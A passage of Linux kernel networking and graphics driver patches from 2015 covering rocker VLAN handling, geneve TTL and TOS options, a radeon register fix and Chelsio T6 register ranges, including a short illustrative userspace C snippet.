Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:05 -0700 Subject: [PATCH 573/872] 
rocker: install/remove router MAC for untagged VLAN when joining/leaving bridge When the port joins a bridge, the port's internal VLAN ID needs to change to the bridge's internal VLAN ID. Likewise, when leaving the bridge, the internal VLAN ID reverts back the port's original internal VLAN ID. (The internal VLAN ID is used by device to internally mark untagged pkts with some VLAN, which will eventually be removed on egress...think PVID). When the internal VLAN ID changes, we need to update the VLAN table entries and the router MAC entries for IP/IPv6 to reflect the new internal VLAN ID. This patch makes use of the common rocker_port_vlan_add/del functions to make sure the tables are updated for the current internal VLAN ID. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 42 +++++++++++++++++----------- 1 file changed, 25 insertions(+), 17 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index 076f3f29fe5c..357f55d4e466 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -5153,41 +5153,49 @@ static bool rocker_port_dev_check(const struct net_device *dev) static int rocker_port_bridge_join(struct rocker_port *rocker_port, struct net_device *bridge) { + u16 untagged_vid = 0; int err; - rocker_port_internal_vlan_id_put(rocker_port, - rocker_port->dev->ifindex); - - rocker_port->bridge_dev = bridge; + /* Port is joining bridge, so the internal VLAN for the + * port is going to change to the bridge internal VLAN. + * Let's remove untagged VLAN (vid=0) from port and + * re-add once internal VLAN has changed. + */ - /* Use bridge internal VLAN ID for untagged pkts */ - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, 0); + err = rocker_port_vlan_del(rocker_port, untagged_vid, 0); if (err) return err; + + rocker_port_internal_vlan_id_put(rocker_port, + rocker_port->dev->ifindex); rocker_port->internal_vlan_id = rocker_port_internal_vlan_id_get(rocker_port, bridge->ifindex); - return rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, 0, 0); + + rocker_port->bridge_dev = bridge; + + return rocker_port_vlan_add(rocker_port, SWITCHDEV_TRANS_NONE, + untagged_vid, 0); } static int rocker_port_bridge_leave(struct rocker_port *rocker_port) { + u16 untagged_vid = 0; int err; - rocker_port_internal_vlan_id_put(rocker_port, - rocker_port->bridge_dev->ifindex); - - rocker_port->bridge_dev = NULL; - - /* Use port internal VLAN ID for untagged pkts */ - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, 0); + err = rocker_port_vlan_del(rocker_port, untagged_vid, 0); if (err) return err; + + rocker_port_internal_vlan_id_put(rocker_port, + rocker_port->bridge_dev->ifindex); rocker_port->internal_vlan_id = rocker_port_internal_vlan_id_get(rocker_port, rocker_port->dev->ifindex); - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, 0, 0); + + rocker_port->bridge_dev = NULL; + + err = rocker_port_vlan_add(rocker_port, SWITCHDEV_TRANS_NONE, + untagged_vid, 0); if (err) return err; From 2aa2ed0864b3cf96479a401c449dd4a3eea15ce8 Mon Sep 17 00:00:00 2001 From: Scott Feldman Date: Mon, 1 Jun 2015 11:39:06 -0700 Subject: [PATCH 574/872] rocker: remove support for legacy VLAN ndo ops Remove support for legacy ndo ops .ndo_vlan_rx_add_vid/.ndo_vlan_rx_kill_vid. Rocker will use bridge_setlink/dellink exclusively for VLAN add/del operations. 
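As a side note on what the setlink path actually carries per VLAN, here is a minimal userspace sketch; struct bridge_vlan_info and the BRIDGE_VLAN_INFO_* bits are taken from the if_bridge uapi header, and the RTM_SETLINK/netlink framing around the attribute is deliberately omitted, so treat it as an illustration rather than a complete tool.

#include <stdio.h>
#include <linux/if_bridge.h>    /* struct bridge_vlan_info, BRIDGE_VLAN_INFO_* */

int main(void)
{
        /* Roughly what "bridge vlan add vid 100 dev DEV self pvid untagged"
         * encodes into the IFLA_BRIDGE_VLAN_INFO attribute of the setlink
         * request; the netlink plumbing itself is left out here.
         */
        struct bridge_vlan_info vinfo = {
                .vid   = 100,
                .flags = BRIDGE_VLAN_INFO_PVID | BRIDGE_VLAN_INFO_UNTAGGED,
        };

        printf("vid %u%s%s\n", (unsigned int)vinfo.vid,
               (vinfo.flags & BRIDGE_VLAN_INFO_PVID) ? " pvid" : "",
               (vinfo.flags & BRIDGE_VLAN_INFO_UNTAGGED) ? " untagged" : "");
        return 0;
}

This is also where the extra per-VLAN information (PVID, egress untagged) mentioned below comes from; the legacy rx_add_vid/rx_kill_vid ops only ever saw a protocol and a VLAN id.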
The legacy ops are needed if using 8021q driver module to setup VLANs on the port. But an alternative exists in using bridge_setlink/delink to setup VLANs, which doesn't depend on 8021q module. So rocker will switch to the newer setlink/dellink ops. VLANs can added/delete from the port, regardless if port is bridged or not, using the bridge commands: bridge vlan [add|del] vid VID dev DEV self (Yes, I agree it's confusing to use the "bridge" command to set a VLAN on a non-bridged port). Using setlink/dellink over legacy ops let's us handle the stacked driver case automatically. It's built-in. setlink also pass additional flags (PVID, egress untagged) that aren't available with the legacy ops. Signed-off-by: Scott Feldman Signed-off-by: David S. Miller --- drivers/net/ethernet/rocker/rocker.c | 34 +--------------------------- 1 file changed, 1 insertion(+), 33 deletions(-) diff --git a/drivers/net/ethernet/rocker/rocker.c b/drivers/net/ethernet/rocker/rocker.c index 357f55d4e466..819289e5be4f 100644 --- a/drivers/net/ethernet/rocker/rocker.c +++ b/drivers/net/ethernet/rocker/rocker.c @@ -4164,35 +4164,6 @@ static int rocker_port_set_mac_address(struct net_device *dev, void *p) return 0; } -static int rocker_port_vlan_rx_add_vid(struct net_device *dev, - __be16 proto, u16 vid) -{ - struct rocker_port *rocker_port = netdev_priv(dev); - int err; - - err = rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, 0, vid); - if (err) - return err; - - return rocker_port_router_mac(rocker_port, SWITCHDEV_TRANS_NONE, - 0, htons(vid)); -} - -static int rocker_port_vlan_rx_kill_vid(struct net_device *dev, - __be16 proto, u16 vid) -{ - struct rocker_port *rocker_port = netdev_priv(dev); - int err; - - err = rocker_port_router_mac(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, htons(vid)); - if (err) - return err; - - return rocker_port_vlan(rocker_port, SWITCHDEV_TRANS_NONE, - ROCKER_OP_FLAG_REMOVE, vid); -} - static int rocker_port_get_phys_port_name(struct net_device *dev, char *buf, size_t len) { @@ -4213,8 +4184,6 @@ static const struct net_device_ops rocker_port_netdev_ops = { .ndo_stop = rocker_port_stop, .ndo_start_xmit = rocker_port_xmit, .ndo_set_mac_address = rocker_port_set_mac_address, - .ndo_vlan_rx_add_vid = rocker_port_vlan_rx_add_vid, - .ndo_vlan_rx_kill_vid = rocker_port_vlan_rx_kill_vid, .ndo_bridge_getlink = switchdev_port_bridge_getlink, .ndo_bridge_setlink = switchdev_port_bridge_setlink, .ndo_bridge_dellink = switchdev_port_bridge_dellink, @@ -4883,8 +4852,7 @@ static int rocker_probe_port(struct rocker *rocker, unsigned int port_number) NAPI_POLL_WEIGHT); rocker_carrier_init(rocker_port); - dev->features |= NETIF_F_NETNS_LOCAL | - NETIF_F_HW_VLAN_CTAG_FILTER; + dev->features |= NETIF_F_NETNS_LOCAL; err = register_netdev(dev); if (err) { From 8760ce58353c2099be35ead62a572ee2d1e83b5b Mon Sep 17 00:00:00 2001 From: "John W. Linville" Date: Mon, 1 Jun 2015 15:51:34 -0400 Subject: [PATCH 575/872] geneve: allow user to specify TTL for tunnel frames Signed-off-by: John W. Linville Signed-off-by: David S. 
Miller --- drivers/net/geneve.c | 18 ++++++++++++++---- include/uapi/linux/if_link.h | 1 + 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c index b7eafa4c1a67..1675dfdbfa70 100644 --- a/drivers/net/geneve.c +++ b/drivers/net/geneve.c @@ -44,7 +44,8 @@ struct geneve_dev { struct net *net; /* netns for packet i/o */ struct net_device *dev; /* netdev for geneve tunnel */ struct geneve_sock *sock; /* socket used for geneve tunnel */ - u8 vni[3]; /* virtual network ID for tunnel */ + u8 vni[3]; /* virtual network ID for tunnel */ + u8 ttl; /* TTL override */ struct sockaddr_in remote; /* IPv4 address for link partner */ struct list_head next; /* geneve's per namespace list */ }; @@ -184,7 +185,7 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) struct flowi4 fl4; int err; __be16 sport; - __u8 tos, ttl = 0; + __u8 tos, ttl; iip = ip_hdr(skb); @@ -207,11 +208,12 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) goto rt_tx_error; } - /* TODO: tos and ttl should be configurable */ + /* TODO: tos should be configurable */ tos = ip_tunnel_ecn_encap(0, iip, skb); - if (IN_MULTICAST(ntohl(fl4.daddr))) + ttl = geneve->ttl; + if (!ttl && IN_MULTICAST(ntohl(fl4.daddr))) ttl = 1; ttl = ttl ? : ip4_dst_hoplimit(&rt->dst); @@ -297,6 +299,7 @@ static void geneve_setup(struct net_device *dev) static const struct nla_policy geneve_policy[IFLA_GENEVE_MAX + 1] = { [IFLA_GENEVE_ID] = { .type = NLA_U32 }, [IFLA_GENEVE_REMOTE] = { .len = FIELD_SIZEOF(struct iphdr, daddr) }, + [IFLA_GENEVE_TTL] = { .type = NLA_U8 }, }; static int geneve_validate(struct nlattr *tb[], struct nlattr *data[]) @@ -364,6 +367,9 @@ static int geneve_newlink(struct net *net, struct net_device *dev, if (err) return err; + if (data[IFLA_GENEVE_TTL]) + geneve->ttl = nla_get_u8(data[IFLA_GENEVE_TTL]); + list_add(&geneve->next, &gn->geneve_list); hlist_add_head_rcu(&geneve->hlist, &gn->vni_list[hash]); @@ -386,6 +392,7 @@ static size_t geneve_get_size(const struct net_device *dev) { return nla_total_size(sizeof(__u32)) + /* IFLA_GENEVE_ID */ nla_total_size(sizeof(struct in_addr)) + /* IFLA_GENEVE_REMOTE */ + nla_total_size(sizeof(__u8)) + /* IFLA_GENEVE_TTL */ 0; } @@ -402,6 +409,9 @@ static int geneve_fill_info(struct sk_buff *skb, const struct net_device *dev) geneve->remote.sin_addr.s_addr)) goto nla_put_failure; + if (nla_put_u8(skb, IFLA_GENEVE_TTL, geneve->ttl)) + goto nla_put_failure; + return 0; nla_put_failure: diff --git a/include/uapi/linux/if_link.h b/include/uapi/linux/if_link.h index afccc9393fef..a834f31db915 100644 --- a/include/uapi/linux/if_link.h +++ b/include/uapi/linux/if_link.h @@ -395,6 +395,7 @@ enum { IFLA_GENEVE_UNSPEC, IFLA_GENEVE_ID, IFLA_GENEVE_REMOTE, + IFLA_GENEVE_TTL, __IFLA_GENEVE_MAX }; #define IFLA_GENEVE_MAX (__IFLA_GENEVE_MAX - 1) From d89511251f6519599b109dc6cda87a6ab314ed8c Mon Sep 17 00:00:00 2001 From: "John W. Linville" Date: Mon, 1 Jun 2015 15:51:35 -0400 Subject: [PATCH 576/872] geneve: allow user to specify TOS info for tunnel frames Signed-off-by: John W. Linville Signed-off-by: David S. 
Miller --- drivers/net/geneve.c | 18 ++++++++++++++---- include/uapi/linux/if_link.h | 1 + 2 files changed, 15 insertions(+), 4 deletions(-) diff --git a/drivers/net/geneve.c b/drivers/net/geneve.c index 1675dfdbfa70..78d49d186e05 100644 --- a/drivers/net/geneve.c +++ b/drivers/net/geneve.c @@ -46,6 +46,7 @@ struct geneve_dev { struct geneve_sock *sock; /* socket used for geneve tunnel */ u8 vni[3]; /* virtual network ID for tunnel */ u8 ttl; /* TTL override */ + u8 tos; /* TOS override */ struct sockaddr_in remote; /* IPv4 address for link partner */ struct list_head next; /* geneve's per namespace list */ }; @@ -194,7 +195,12 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) /* TODO: port min/max limits should be configurable */ sport = udp_flow_src_port(dev_net(dev), skb, 0, 0, true); + tos = geneve->tos; + if (tos == 1) + tos = ip_tunnel_get_dsfield(iip, skb); + memset(&fl4, 0, sizeof(fl4)); + fl4.flowi4_tos = RT_TOS(tos); fl4.daddr = geneve->remote.sin_addr.s_addr; rt = ip_route_output_key(geneve->net, &fl4); if (IS_ERR(rt)) { @@ -208,9 +214,7 @@ static netdev_tx_t geneve_xmit(struct sk_buff *skb, struct net_device *dev) goto rt_tx_error; } - /* TODO: tos should be configurable */ - - tos = ip_tunnel_ecn_encap(0, iip, skb); + tos = ip_tunnel_ecn_encap(tos, iip, skb); ttl = geneve->ttl; if (!ttl && IN_MULTICAST(ntohl(fl4.daddr))) @@ -300,6 +304,7 @@ static const struct nla_policy geneve_policy[IFLA_GENEVE_MAX + 1] = { [IFLA_GENEVE_ID] = { .type = NLA_U32 }, [IFLA_GENEVE_REMOTE] = { .len = FIELD_SIZEOF(struct iphdr, daddr) }, [IFLA_GENEVE_TTL] = { .type = NLA_U8 }, + [IFLA_GENEVE_TOS] = { .type = NLA_U8 }, }; static int geneve_validate(struct nlattr *tb[], struct nlattr *data[]) @@ -370,6 +375,9 @@ static int geneve_newlink(struct net *net, struct net_device *dev, if (data[IFLA_GENEVE_TTL]) geneve->ttl = nla_get_u8(data[IFLA_GENEVE_TTL]); + if (data[IFLA_GENEVE_TOS]) + geneve->tos = nla_get_u8(data[IFLA_GENEVE_TOS]); + list_add(&geneve->next, &gn->geneve_list); hlist_add_head_rcu(&geneve->hlist, &gn->vni_list[hash]); @@ -393,6 +401,7 @@ static size_t geneve_get_size(const struct net_device *dev) return nla_total_size(sizeof(__u32)) + /* IFLA_GENEVE_ID */ nla_total_size(sizeof(struct in_addr)) + /* IFLA_GENEVE_REMOTE */ nla_total_size(sizeof(__u8)) + /* IFLA_GENEVE_TTL */ + nla_total_size(sizeof(__u8)) + /* IFLA_GENEVE_TOS */ 0; } @@ -409,7 +418,8 @@ static int geneve_fill_info(struct sk_buff *skb, const struct net_device *dev) geneve->remote.sin_addr.s_addr)) goto nla_put_failure; - if (nla_put_u8(skb, IFLA_GENEVE_TTL, geneve->ttl)) + if (nla_put_u8(skb, IFLA_GENEVE_TTL, geneve->ttl) || + nla_put_u8(skb, IFLA_GENEVE_TOS, geneve->tos)) goto nla_put_failure; return 0; diff --git a/include/uapi/linux/if_link.h b/include/uapi/linux/if_link.h index a834f31db915..1737b7a8272b 100644 --- a/include/uapi/linux/if_link.h +++ b/include/uapi/linux/if_link.h @@ -396,6 +396,7 @@ enum { IFLA_GENEVE_ID, IFLA_GENEVE_REMOTE, IFLA_GENEVE_TTL, + IFLA_GENEVE_TOS, __IFLA_GENEVE_MAX }; #define IFLA_GENEVE_MAX (__IFLA_GENEVE_MAX - 1) From 091f0a70ffe2a1297d52fe32d6c6794d955e01e5 Mon Sep 17 00:00:00 2001 From: Alex Deucher Date: Mon, 1 Jun 2015 18:10:24 -0400 Subject: [PATCH 577/872] drm/radeon: use proper ACR regisiter for DCE3.2 Using the DCE2 one by accident afer the audio rework. 
Bug: https://bugs.freedesktop.org/show_bug.cgi?id=90777 Signed-off-by: Alex Deucher Cc: stable@vger.kernel.org --- drivers/gpu/drm/radeon/dce3_1_afmt.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/radeon/dce3_1_afmt.c b/drivers/gpu/drm/radeon/dce3_1_afmt.c index f04205170b8a..cfa3a84a2af0 100644 --- a/drivers/gpu/drm/radeon/dce3_1_afmt.c +++ b/drivers/gpu/drm/radeon/dce3_1_afmt.c @@ -173,7 +173,7 @@ void dce3_2_hdmi_update_acr(struct drm_encoder *encoder, long offset, struct drm_device *dev = encoder->dev; struct radeon_device *rdev = dev->dev_private; - WREG32(HDMI0_ACR_PACKET_CONTROL + offset, + WREG32(DCE3_HDMI0_ACR_PACKET_CONTROL + offset, HDMI0_ACR_SOURCE | /* select SW CTS value */ HDMI0_ACR_AUTO_SEND); /* allow hw to sent ACR packets when required */ From ab4b583b8333afb8bdb7e698a49921dfab80d128 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Tue, 2 Jun 2015 13:59:38 +0530 Subject: [PATCH 578/872] cxgb4: Add is_t6 macro and T6 register ranges Adds new macro is_t6 and adds the register address range for T6 adapter Signed-off-by: Hariprasad Shenai Signed-off-by: David S. Miller --- drivers/net/ethernet/chelsio/cxgb4/cxgb4.h | 10 + drivers/net/ethernet/chelsio/cxgb4/t4_hw.c | 344 +++++++++++++++++++++ 2 files changed, 354 insertions(+) diff --git a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h index 15cca3013de2..83773f3bf2e7 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h +++ b/drivers/net/ethernet/chelsio/cxgb4/cxgb4.h @@ -273,6 +273,7 @@ struct pci_params { #define CHELSIO_T4 0x4 #define CHELSIO_T5 0x5 +#define CHELSIO_T6 0x6 enum chip_type { T4_A1 = CHELSIO_CHIP_CODE(CHELSIO_T4, 1), @@ -284,6 +285,10 @@ enum chip_type { T5_A1 = CHELSIO_CHIP_CODE(CHELSIO_T5, 1), T5_FIRST_REV = T5_A0, T5_LAST_REV = T5_A1, + + T6_A0 = CHELSIO_CHIP_CODE(CHELSIO_T6, 0), + T6_FIRST_REV = T6_A0, + T6_LAST_REV = T6_A0, }; struct devlog_params { @@ -850,6 +855,11 @@ enum { VLAN_REWRITE }; +static inline int is_t6(enum chip_type chip) +{ + return CHELSIO_CHIP_VERSION(chip) == CHELSIO_T6; +} + static inline int is_t5(enum chip_type chip) { return CHELSIO_CHIP_VERSION(chip) == CHELSIO_T5; diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c index 36a858c24305..e9ccfeb4ec03 100644 --- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c +++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c @@ -634,6 +634,7 @@ unsigned int t4_get_regs_len(struct adapter *adapter) return T4_REGMAP_SIZE; case CHELSIO_T5: + case CHELSIO_T6: return T5_REGMAP_SIZE; } @@ -1316,6 +1317,344 @@ void t4_get_regs(struct adapter *adap, void *buf, size_t buf_size) 0x51300, 0x51308, }; + static const unsigned int t6_reg_ranges[] = { + 0x1008, 0x114c, + 0x1180, 0x11b4, + 0x11fc, 0x1250, + 0x1280, 0x133c, + 0x1800, 0x18fc, + 0x3000, 0x302c, + 0x3060, 0x30d8, + 0x30e0, 0x30fc, + 0x3140, 0x357c, + 0x35a8, 0x35cc, + 0x35ec, 0x35ec, + 0x3600, 0x5624, + 0x56cc, 0x575c, + 0x580c, 0x5814, + 0x5890, 0x58bc, + 0x5940, 0x595c, + 0x5980, 0x598c, + 0x59b0, 0x59dc, + 0x59fc, 0x5a18, + 0x5a60, 0x5a6c, + 0x5a80, 0x5a9c, + 0x5b94, 0x5bfc, + 0x5c10, 0x5ec0, + 0x5ec8, 0x5ec8, + 0x6000, 0x6040, + 0x6058, 0x6154, + 0x7700, 0x7798, + 0x77c0, 0x7880, + 0x78cc, 0x78fc, + 0x7b00, 0x7c54, + 0x7d00, 0x7efc, + 0x8dc0, 0x8de0, + 0x8df8, 0x8e84, + 0x8ea0, 0x8f88, + 0x8fb8, 0x911c, + 0x9400, 0x9470, + 0x9600, 0x971c, + 0x9800, 0x9808, + 0x9820, 0x983c, + 0x9850, 0x9864, + 0x9c00, 0x9c6c, + 0x9c80, 0x9cec, + 0x9d00, 0x9d6c, + 0x9d80, 0x9dec, + 
0x9e00, 0x9e6c, + 0x9e80, 0x9eec, + 0x9f00, 0x9f6c, + 0x9f80, 0xa020, + 0xd004, 0xd03c, + 0xdfc0, 0xdfe0, + 0xe000, 0xf008, + 0x11000, 0x11014, + 0x11048, 0x11110, + 0x11118, 0x1117c, + 0x11190, 0x11260, + 0x11300, 0x1130c, + 0x12000, 0x1205c, + 0x19040, 0x1906c, + 0x19078, 0x19080, + 0x1908c, 0x19124, + 0x19150, 0x191b0, + 0x191d0, 0x191e8, + 0x19238, 0x192b8, + 0x193f8, 0x19474, + 0x19490, 0x194cc, + 0x194f0, 0x194f8, + 0x19c00, 0x19c80, + 0x19c94, 0x19cbc, + 0x19ce4, 0x19d28, + 0x19d50, 0x19d78, + 0x19d94, 0x19dc8, + 0x19df0, 0x19e10, + 0x19e50, 0x19e6c, + 0x19ea0, 0x19f34, + 0x19f40, 0x19f50, + 0x19f90, 0x19fac, + 0x19fc4, 0x19fe4, + 0x1a000, 0x1a06c, + 0x1a0b0, 0x1a120, + 0x1a128, 0x1a138, + 0x1a190, 0x1a1c4, + 0x1a1fc, 0x1a1fc, + 0x1e008, 0x1e00c, + 0x1e040, 0x1e04c, + 0x1e284, 0x1e290, + 0x1e2c0, 0x1e2c0, + 0x1e2e0, 0x1e2e0, + 0x1e300, 0x1e384, + 0x1e3c0, 0x1e3c8, + 0x1e408, 0x1e40c, + 0x1e440, 0x1e44c, + 0x1e684, 0x1e690, + 0x1e6c0, 0x1e6c0, + 0x1e6e0, 0x1e6e0, + 0x1e700, 0x1e784, + 0x1e7c0, 0x1e7c8, + 0x1e808, 0x1e80c, + 0x1e840, 0x1e84c, + 0x1ea84, 0x1ea90, + 0x1eac0, 0x1eac0, + 0x1eae0, 0x1eae0, + 0x1eb00, 0x1eb84, + 0x1ebc0, 0x1ebc8, + 0x1ec08, 0x1ec0c, + 0x1ec40, 0x1ec4c, + 0x1ee84, 0x1ee90, + 0x1eec0, 0x1eec0, + 0x1eee0, 0x1eee0, + 0x1ef00, 0x1ef84, + 0x1efc0, 0x1efc8, + 0x1f008, 0x1f00c, + 0x1f040, 0x1f04c, + 0x1f284, 0x1f290, + 0x1f2c0, 0x1f2c0, + 0x1f2e0, 0x1f2e0, + 0x1f300, 0x1f384, + 0x1f3c0, 0x1f3c8, + 0x1f408, 0x1f40c, + 0x1f440, 0x1f44c, + 0x1f684, 0x1f690, + 0x1f6c0, 0x1f6c0, + 0x1f6e0, 0x1f6e0, + 0x1f700, 0x1f784, + 0x1f7c0, 0x1f7c8, + 0x1f808, 0x1f80c, + 0x1f840, 0x1f84c, + 0x1fa84, 0x1fa90, + 0x1fac0, 0x1fac0, + 0x1fae0, 0x1fae0, + 0x1fb00, 0x1fb84, + 0x1fbc0, 0x1fbc8, + 0x1fc08, 0x1fc0c, + 0x1fc40, 0x1fc4c, + 0x1fe84, 0x1fe90, + 0x1fec0, 0x1fec0, + 0x1fee0, 0x1fee0, + 0x1ff00, 0x1ff84, + 0x1ffc0, 0x1ffc8, + 0x30000, 0x30070, + 0x30100, 0x3015c, + 0x30190, 0x301d0, + 0x30200, 0x30318, + 0x30400, 0x3052c, + 0x30540, 0x3061c, + 0x30800, 0x3088c, + 0x308c0, 0x30908, + 0x30910, 0x309b8, + 0x30a00, 0x30a04, + 0x30a0c, 0x30a2c, + 0x30a44, 0x30a50, + 0x30a74, 0x30c24, + 0x30d00, 0x30d3c, + 0x30d44, 0x30d7c, + 0x30de0, 0x30de0, + 0x30e00, 0x30ed4, + 0x30f00, 0x30fa4, + 0x30fc0, 0x30fc4, + 0x31000, 0x31004, + 0x31080, 0x310fc, + 0x31208, 0x31220, + 0x3123c, 0x31254, + 0x31300, 0x31300, + 0x31308, 0x3131c, + 0x31338, 0x3133c, + 0x31380, 0x31380, + 0x31388, 0x313a8, + 0x313b4, 0x313b4, + 0x31400, 0x31420, + 0x31438, 0x3143c, + 0x31480, 0x31480, + 0x314a8, 0x314a8, + 0x314b0, 0x314b4, + 0x314c8, 0x314d4, + 0x31a40, 0x31a4c, + 0x31af0, 0x31b20, + 0x31b38, 0x31b3c, + 0x31b80, 0x31b80, + 0x31ba8, 0x31ba8, + 0x31bb0, 0x31bb4, + 0x31bc8, 0x31bd4, + 0x32140, 0x3218c, + 0x321f0, 0x32200, + 0x32218, 0x32218, + 0x32400, 0x32400, + 0x32408, 0x3241c, + 0x32618, 0x32620, + 0x32664, 0x32664, + 0x326a8, 0x326a8, + 0x326ec, 0x326ec, + 0x32a00, 0x32abc, + 0x32b00, 0x32b78, + 0x32c00, 0x32c00, + 0x32c08, 0x32c3c, + 0x32e00, 0x32e2c, + 0x32f00, 0x32f2c, + 0x33000, 0x330ac, + 0x330c0, 0x331ac, + 0x331c0, 0x332c4, + 0x332e4, 0x333c4, + 0x333e4, 0x334ac, + 0x334c0, 0x335ac, + 0x335c0, 0x336c4, + 0x336e4, 0x337c4, + 0x337e4, 0x337fc, + 0x33814, 0x33814, + 0x33854, 0x33868, + 0x33880, 0x3388c, + 0x338c0, 0x338d0, + 0x338e8, 0x338ec, + 0x33900, 0x339ac, + 0x339c0, 0x33ac4, + 0x33ae4, 0x33b10, + 0x33b24, 0x33b50, + 0x33bf0, 0x33c10, + 0x33c24, 0x33c50, + 0x33cf0, 0x33cfc, + 0x34000, 0x34070, + 0x34100, 0x3415c, + 0x34190, 0x341d0, + 0x34200, 0x34318, + 0x34400, 0x3452c, + 0x34540, 0x3461c, + 0x34800, 
0x3488c, + 0x348c0, 0x34908, + 0x34910, 0x349b8, + 0x34a00, 0x34a04, + 0x34a0c, 0x34a2c, + 0x34a44, 0x34a50, + 0x34a74, 0x34c24, + 0x34d00, 0x34d3c, + 0x34d44, 0x34d7c, + 0x34de0, 0x34de0, + 0x34e00, 0x34ed4, + 0x34f00, 0x34fa4, + 0x34fc0, 0x34fc4, + 0x35000, 0x35004, + 0x35080, 0x350fc, + 0x35208, 0x35220, + 0x3523c, 0x35254, + 0x35300, 0x35300, + 0x35308, 0x3531c, + 0x35338, 0x3533c, + 0x35380, 0x35380, + 0x35388, 0x353a8, + 0x353b4, 0x353b4, + 0x35400, 0x35420, + 0x35438, 0x3543c, + 0x35480, 0x35480, + 0x354a8, 0x354a8, + 0x354b0, 0x354b4, + 0x354c8, 0x354d4, + 0x35a40, 0x35a4c, + 0x35af0, 0x35b20, + 0x35b38, 0x35b3c, + 0x35b80, 0x35b80, + 0x35ba8, 0x35ba8, + 0x35bb0, 0x35bb4, + 0x35bc8, 0x35bd4, + 0x36140, 0x3618c, + 0x361f0, 0x36200, + 0x36218, 0x36218, + 0x36400, 0x36400, + 0x36408, 0x3641c, + 0x36618, 0x36620, + 0x36664, 0x36664, + 0x366a8, 0x366a8, + 0x366ec, 0x366ec, + 0x36a00, 0x36abc, + 0x36b00, 0x36b78, + 0x36c00, 0x36c00, + 0x36c08, 0x36c3c, + 0x36e00, 0x36e2c, + 0x36f00, 0x36f2c, + 0x37000, 0x370ac, + 0x370c0, 0x371ac, + 0x371c0, 0x372c4, + 0x372e4, 0x373c4, + 0x373e4, 0x374ac, + 0x374c0, 0x375ac, + 0x375c0, 0x376c4, + 0x376e4, 0x377c4, + 0x377e4, 0x377fc, + 0x37814, 0x37814, + 0x37854, 0x37868, + 0x37880, 0x3788c, + 0x378c0, 0x378d0, + 0x378e8, 0x378ec, + 0x37900, 0x379ac, + 0x379c0, 0x37ac4, + 0x37ae4, 0x37b10, + 0x37b24, 0x37b50, + 0x37bf0, 0x37c10, + 0x37c24, 0x37c50, + 0x37cf0, 0x37cfc, + 0x40040, 0x40040, + 0x40080, 0x40084, + 0x40100, 0x40100, + 0x40140, 0x401bc, + 0x40200, 0x40214, + 0x40228, 0x40228, + 0x40240, 0x40258, + 0x40280, 0x40280, + 0x40304, 0x40304, + 0x40330, 0x4033c, + 0x41304, 0x413dc, + 0x41400, 0x4141c, + 0x41480, 0x414d0, + 0x44000, 0x4407c, + 0x440c0, 0x4427c, + 0x442c0, 0x4447c, + 0x444c0, 0x4467c, + 0x446c0, 0x4487c, + 0x448c0, 0x44a7c, + 0x44ac0, 0x44c7c, + 0x44cc0, 0x44e7c, + 0x44ec0, 0x4507c, + 0x450c0, 0x451fc, + 0x45800, 0x45868, + 0x45880, 0x45884, + 0x458a0, 0x458b0, + 0x45a00, 0x45a68, + 0x45a80, 0x45a84, + 0x45aa0, 0x45ab0, + 0x460c0, 0x460e4, + 0x47000, 0x4708c, + 0x47200, 0x47250, + 0x47400, 0x47420, + 0x47600, 0x47618, + 0x47800, 0x4782c, + 0x50000, 0x500cc, + 0x50400, 0x50400, + 0x50800, 0x508cc, + 0x50c00, 0x50c00, + 0x51000, 0x510b0, + 0x51300, 0x51324, + }; + u32 *buf_end = (u32 *)((char *)buf + buf_size); const unsigned int *reg_ranges; int reg_ranges_size, range; @@ -1335,6 +1674,11 @@ void t4_get_regs(struct adapter *adap, void *buf, size_t buf_size) reg_ranges_size = ARRAY_SIZE(t5_reg_ranges); break; + case CHELSIO_T6: + reg_ranges = t6_reg_ranges; + reg_ranges_size = ARRAY_SIZE(t6_reg_ranges); + break; + default: dev_err(adap->pdev_dev, "Unsupported chip version %d\n", chip_version); From 3ccc6cf74d8c0059ae076aee3bf83c9124815404 Mon Sep 17 00:00:00 2001 From: Hariprasad Shenai Date: Tue, 2 Jun 2015 13:59:39 +0530 Subject: [PATCH 579/872] cxgb4: Adds support for T6 adapter Adds NIC driver related changes for T6 adapter. Register related changes, MC related changes, VF related changes, doorbell related changes, debugfs changes, etc Signed-off-by: Hariprasad Shenai Signed-off-by: David S. 
